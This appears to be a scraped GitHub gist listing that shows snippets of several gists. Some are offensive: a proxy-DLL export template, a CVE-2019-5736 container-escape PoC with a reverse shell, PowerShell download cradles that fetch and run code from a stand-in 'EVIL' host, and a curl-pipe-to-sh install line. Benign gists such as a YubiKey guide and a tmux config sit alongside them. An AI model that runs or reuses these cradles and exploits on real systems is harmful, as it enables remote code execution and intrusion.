Skip to content

Instantly share code, notes, and snippets.

View mirchr's full-sized avatar

Rich Mirch mirchr

View GitHub Profile
@p0shkatz
p0shkatz / proxydll.cpp
Created July 18, 2022 18:48
Proxy DLL uses exports from target DLL
#include "pch.h"
#include <windows.h>
#include <string>
#include <iostream>
#pragma comment(linker, "/export:FunctionName1=C:\\\\path\\\\to\\\\legitDLL.FunctionName1")
#pragma comment(linker, "/export:FunctionName2=C:\\\\path\\\\to\\\\legitDLL.FunctionName2")
#pragma comment(linker, "/export:FunctionName3=C:\\\\path\\\\to\\\\legitDLL.FunctionName3")
#pragma comment(linker, "/export:FunctionName4=C:\\\\path\\\\to\\\\legitDLL.FunctionName4")
#pragma comment(linker, "/export:FunctionName5=C:\\\\path\\\\to\\\\legitDLL.FunctionName5")

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@singe
singe / cve-2019-5736.py
Last active April 30, 2023 06:18
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@ageis
ageis / YubiKey-GPG-SSH-guide.md
Last active October 30, 2024 07:49
Technical guide for using YubiKey series 4 for GPG and SSH

YubiKey 4 series GPG and SSH setup guide

Written for fairly adept technical users, preferably of Debian GNU/Linux, not for absolute beginners.

You'll probably be working with a single smartcard, so you'll want only one primary key (1. Sign & Certify) and two associated subkeys (2. Encrypt, 3. Authenticate). I've published a Bash function which automates this slightly special key generation process.

@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active November 17, 2024 21:45
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@erikh
erikh / hack.sh
Created March 31, 2012 07:02 — forked from DAddYE/hack.sh
OSX For Hackers
#!/usr/bin/env sh
##
# This is script with usefull tips taken from:
# https://github.com/mathiasbynens/dotfiles/blob/master/.osx
#
# install it:
# curl -sL https://raw.github.com/gist/2108403/hack.sh | sh
#
@spicycode
spicycode / tmux.conf
Created September 20, 2011 16:43
The best and greatest tmux.conf ever
# 0 is too far from ` ;)
set -g base-index 1
# Automatically set window title
set-window-option -g automatic-rename on
set-option -g set-titles on
#set -g default-terminal screen-256color
set -g status-keys vi
set -g history-limit 10000